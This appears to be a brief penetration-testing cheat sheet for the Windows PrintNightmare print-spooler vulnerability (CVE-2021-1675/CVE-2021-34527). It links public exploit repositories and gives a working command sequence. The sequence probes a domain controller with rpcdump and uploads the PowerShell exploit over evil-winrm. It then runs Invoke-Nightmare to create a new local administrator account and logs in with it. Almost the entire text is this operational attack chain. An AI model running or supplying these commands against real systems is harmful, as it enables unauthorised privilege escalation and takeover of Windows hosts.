Print Nightmare

cube0x0 RCE

GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527GitHub

calebstewart LPE

GitHub - calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)GitHub

rpcdump.py @<DC_ip> | egrep 'MS-RPRN|MS-PAR'

we need authenticated user access to run PrintNightmare

Using evil-winrm upload the exploit to the target

Import-Module .\CVE-2021-1675.ps1

Invoke-Nightmare -NewUser "username" -NewPassword "pass" (the user will be local admin)

evil-winrm -I <ip> -u user -p pass